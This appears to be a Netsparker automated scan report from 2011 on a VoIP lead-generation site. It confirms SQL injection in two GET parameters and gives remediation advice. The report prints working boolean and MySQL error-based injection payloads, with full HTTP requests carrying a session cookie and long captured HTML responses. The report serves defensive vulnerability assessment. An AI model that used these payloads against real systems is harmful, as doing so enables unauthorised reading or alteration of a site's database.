XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Netsparker - Scan Report Summary

TARGET URL	http://www.insideup.com/ppc/leadflow/hins00/p...
SCAN DATE	3/13/2011 8:23:47 PM
REPORT DATE	3/14/2011 6:06:09 AM
SCAN DURATION	01:07:56

Total Requests

Average Speed

req/sec.

identified

confirmed

critical

informational

GHDB, DORK Tests

PROFILE	Previous Settings
ENABLED ENGINES	Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	CRITICAL 64 % LOW 29 % INFORMATION 7 %

Boolean Based SQL Injection

2 TOTAL

CRITICAL

CONFIRMED

SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

MSDN - Protect From SQL Injection in ASP.NET

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3

Parameters

Parameter	Type	Value
catId	GET	' OR 'ns'='ns
iusrc	GET	3

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:48:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.insideup.com/ppc/leadflow/">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
<meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
<meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
<link rel="stylesheet" href="css/newlanding_style.css" />
<link rel="stylesheet" href="style/dhtmlwindow.css" />
<link rel="stylesheet" href="css/ui.core.css" />
<link rel="stylesheet" href="css/Dyn_form_style.css" />
<script type="text/javascript" src='js/jquery.js'></script>
<script type="text/javascript" src="js/ui.core.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery("form").attr("autocomplete", "off");
});
var global_form_attribute = 8 </script>

<script language="javascript" src="js/dhtmlwindow.js"></script>
<script language="javascript" src="js/modal.js"></script>
<script type="text/javascript" src="js/application_js.js"></script>
<link href="css/styles.css" rel="stylesheet" type="text/css" />
<script>
function frmprompt(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
}
function frmprompt02(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
}
</script>
<style>
#step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, {
font-size:12px;
width:100%;
}
.blackback {
background-color:#cccccc;
}
.whiteback {
background-color:#ffffff;
}
</style>
</head>
<body>
<div id="Main_div_wrap">
<div id="Main_Contant_Block">
<div id="lending_headern">
<table width="900" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="175" valign="middle">
<div style="padding-top: 13px; padding-bottom: 7px; padding-left: 13px;">
<a href="http://www.insideup.com/selectvendors.html" target="_blank"><img border="0" src="http://www.insideup.com/ppc/tools/images/newlanding_insideuplogo.jpg"/></a>
</div>
</td>

<td width="729">
<div class="Tx_S24 Tx_BlueL Tx_B" style="padding-top: 29px; padding-bottom: 10px; padding-left: 13px;"> Compare Managed VoIP Services<br />
<span class="Tx_S14 Tx_B Tx_black"> Get Free Comparison Guide, Plus 5 Quotes from Top Managed VoIP Companies</span>
</div>
</td>
</tr>
</table>
</div>

<div class="process_section">
<div class="left_ronud"></div>
<div class="mid_process">
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:10px;">
<tr>
<td width="4%"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_2.jpg" width="34" height="64" /></td>
<td width="23%" style="padding-left: 8px;"><span class="Green_Txt" style="display:block;">Describe Your Project </span> <span class="Light_blackText">Takes 2 Minutes</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_3.jpg" width="38" height="64" /></td>
<td width="34%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Get Matched with Top Vendors </span> <span class="Light_blackText">8x8, Fonality, Vocalocity & More</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_4.jpg" width="38" height="64" /></td>
<td width="25%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Compare Quotes & Save </span> <span class="Light_blackText">No Obligation to Buy</span></td>
</tr>
</table>
</div>
<div class="right_ronud"></div>
</div>

<div class="form_area_section">
<div class="mid_form_left_section">
<form method="post" action="project_dynamic_page_updated.php?catId=110005&group=ManagedVoIP&template=3" ID="insideupform" name="insideupform" onsubmit="return checkValues();">
<input type="hidden" name="subcategoryId" value="110005">
<input type="hidden" name="catId" value="110005">
<input type="hidden" name="iusrc" value="3 ">

<table width="550" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="535" align="right" class="Green_Txt1 Tx_S18 Tx_B">
<div id="modalalertdiv" style="display:none;">
<div class="myformpopbox">
<strong>What is InsideUp?</strong><br />
InsideUp is a unique and free online community where businesses such
as yours can connect with qualified vendors of business services who
compete for your business.<br />
<br />
<strong>How does it work?</strong><br />
You answer some questions about your business needs, and provide us
with your company and contact information, and we match you using our
superior matching technology with up to 5 reputable vendors, who will
respond within one business day either by phone or email.<br />
<br />
<strong>How do you protect my privacy?</strong><br />
InsideUp is an accredited business by the Better Business Bureau and
is secured by DigiCert. Your information is highly secure with us and
will only be given to up to 5 pre-screened, reputable vendors matched
to your specific needs.
</div>
</div>
</td>
</tr>

<tr>
<td height="30" valign="middle">
<div style="padding-left:1px;">
<span style="font-size: 12px;" class="Tx_S9">
Need to Talk to a Representative? <span style="color:#FF803E">Call (800) 417-9210</span> Anytime
</span>
</div>
</td>
</tr>

<tr>
<td>
<div style="float:left;">

<div id="Dyn_head" style="clear:left;float:left;">
<div class="Head_Txt" style="float:left;padding-left:8px;">Submit Your VoIP Needs</div>
<div style="float:right;padding-top:10px;padding-right:8px;"><span class="Tx_S9"><span class='Tx_S9'>Questions? </span><a href='#' onClick='frmprompt(); return false' class='bluetext Tx_S9'>Review FAQs</a></span></div>
</div>

<div id="Dyn_mid" style="clear:left;float:left;position:relative;">


<div id="step_1" class="form-panel ">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
What type of data connection do you have? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1553__DSL" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>DSL</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1554__T1" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>T1</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1555__T3" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>T3</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1556__Cable" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Cable</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1557__Fiber" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Fiber</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1558__Satellite" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Satellite</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1559__Other" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Other</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1560__Don't have broadband connection" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Don't have broadband connection</label></div></div> </p>
</div>
</div>
<div id="step_2" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
What best describes your desired solution? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1517__One office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>One office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1518__Multiple office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Multiple office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1519__Call center" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Call center</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1520__Home office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Home office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1569__Not Sure" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Not Sure</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1570__Other" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Other</label></div></div> </p>
</div>
</div>
<div id="step_3" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
How soon do you plan to purchase VoIP service? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1530__ASAP" id="radio_3" name="attributeId_329"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>ASAP</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1531__Within 1 month" id="radio_3" name="attributeId_329"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Within 1 month</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1532__Between 2 and 4 months" id="radio_3&qu..

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+OR+'ns'%..

Parameters

Parameter	Type	Value
catId	GET	50002
iusrc	GET	' OR 'ns'='ns

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+OR+'ns'%3d'ns HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:21:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.insideup.com/ppc/leadflow/">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
<meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
<meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
<link rel="stylesheet" href="css/newlanding_style.css" />
<link rel="stylesheet" href="style/dhtmlwindow.css" />
<link rel="stylesheet" href="css/ui.core.css" />
<link rel="stylesheet" href="css/Dyn_form_style.css" />
<script type="text/javascript" src='js/jquery.js'></script>
<script type="text/javascript" src="js/ui.core.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery("form").attr("autocomplete", "off");
});
var global_form_attribute = 8 </script>

<script language="javascript" src="js/dhtmlwindow.js"></script>
<script language="javascript" src="js/modal.js"></script>
<script type="text/javascript" src="js/application_js.js"></script>
<link href="css/styles.css" rel="stylesheet" type="text/css" />
<script>
function frmprompt(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
}
function frmprompt02(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
}
</script>
<style>
#step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, {
font-size:12px;
width:100%;
}
.blackback {
background-color:#cccccc;
}
.whiteback {
background-color:#ffffff;
}
</style>
</head>
<body>
<div id="Main_div_wrap">
<div id="Main_Contant_Block">
<div id="lending_headern">
<table width="900" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="175" valign="middle">
<div style="padding-top: 13px; padding-bottom: 7px; padding-left: 13px;">
<a href="http://www.insideup.com/selectvendors.html" target="_blank"><img border="0" src="http://www.insideup.com/ppc/tools/images/newlanding_insideuplogo.jpg"/></a>
</div>
</td>

<td width="729">
<div class="Tx_S24 Tx_BlueL Tx_B" style="padding-top: 29px; padding-bottom: 10px; padding-left: 13px;"> Compare Managed VoIP Services<br />
<span class="Tx_S14 Tx_B Tx_black"> Get Free Comparison Guide, Plus 5 Quotes from Top Managed VoIP Companies</span>
</div>
</td>
</tr>
</table>
</div>

<div class="process_section">
<div class="left_ronud"></div>
<div class="mid_process">
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:10px;">
<tr>
<td width="4%"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_2.jpg" width="34" height="64" /></td>
<td width="23%" style="padding-left: 8px;"><span class="Green_Txt" style="display:block;">Describe Your Project </span> <span class="Light_blackText">Takes 2 Minutes</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_3.jpg" width="38" height="64" /></td>
<td width="34%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Get Matched with Top Vendors </span> <span class="Light_blackText">8x8, Fonality, Vocalocity & More</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_4.jpg" width="38" height="64" /></td>
<td width="25%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Compare Quotes & Save </span> <span class="Light_blackText">No Obligation to Buy</span></td>
</tr>
</table>
</div>
<div class="right_ronud"></div>
</div>

<div class="form_area_section">
<div class="mid_form_left_section">
<form method="post" action="project_dynamic_page_updated.php?catId=110005&group=ManagedVoIP&template=3" ID="insideupform" name="insideupform" onsubmit="return checkValues();">
<input type="hidden" name="subcategoryId" value="110005">
<input type="hidden" name="catId" value="110005">
<input type="hidden" name="iusrc" value="' OR 'ns'='ns ">

<table width="550" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="535" align="right" class="Green_Txt1 Tx_S18 Tx_B">
<div id="modalalertdiv" style="display:none;">
<div class="myformpopbox">
<strong>What is InsideUp?</strong><br />
InsideUp is a unique and free online community where businesses such
as yours can connect with qualified vendors of business services who
compete for your business.<br />
<br />
<strong>How does it work?</strong><br />
You answer some questions about your business needs, and provide us
with your company and contact information, and we match you using our
superior matching technology with up to 5 reputable vendors, who will
respond within one business day either by phone or email.<br />
<br />
<strong>How do you protect my privacy?</strong><br />
InsideUp is an accredited business by the Better Business Bureau and
is secured by DigiCert. Your information is highly secure with us and
will only be given to up to 5 pre-screened, reputable vendors matched
to your specific needs.
</div>
</div>
</td>
</tr>

<tr>
<td height="30" valign="middle">
<div style="padding-left:1px;">
<span style="font-size: 12px;" class="Tx_S9">
Need to Talk to a Representative? <span style="color:#FF803E">Call (800) 417-9210</span> Anytime
</span>
</div>
</td>
</tr>

<tr>
<td>
<div style="float:left;">

<div id="Dyn_head" style="clear:left;float:left;">
<div class="Head_Txt" style="float:left;padding-left:8px;">Submit Your VoIP Needs</div>
<div style="float:right;padding-top:10px;padding-right:8px;"><span class="Tx_S9"><span class='Tx_S9'>Questions? </span><a href='#' onClick='frmprompt(); return false' class='bluetext Tx_S9'>Review FAQs</a></span></div>
</div>

<div id="Dyn_mid" style="clear:left;float:left;position:relative;">


<div id="step_1" class="form-panel ">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
What type of data connection do you have? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1553__DSL" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>DSL</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1554__T1" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>T1</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1555__T3" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>T3</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1556__Cable" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Cable</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1557__Fiber" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Fiber</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1558__Satellite" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Satellite</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1559__Other" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Other</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1560__Don't have broadband connection" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Don't have broadband connection</label></div></div> </p>
</div>
</div>
<div id="step_2" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
What best describes your desired solution? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1517__One office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>One office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1518__Multiple office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Multiple office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1519__Call center" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Call center</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1520__Home office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Home office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1569__Not Sure" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Not Sure</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1570__Other" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Other</label></div></div> </p>
</div>
</div>
<div id="step_3" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
How soon do you plan to purchase VoIP service? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1530__ASAP" id="radio_3" name="attributeId_329"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>ASAP</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1531__Within 1 month" id="radio_3" name="attributeId_329"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Within 1 month</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1532__Between 2 and 4 months" id=&quo..

SQL Injection

2 TOTAL

CRITICAL

CONFIRMED

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

External References

Remedy References

MSDN - Protect From SQL Injection in ASP.NET

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='%2B(select+1+and+row(..

Parameters

Parameter	Type	Value
catId	GET	'+(select 1 and row(1,1)>(select count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc	GET	3

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3997
Connection: close
Content-Type: text/html; charset=UTF-8

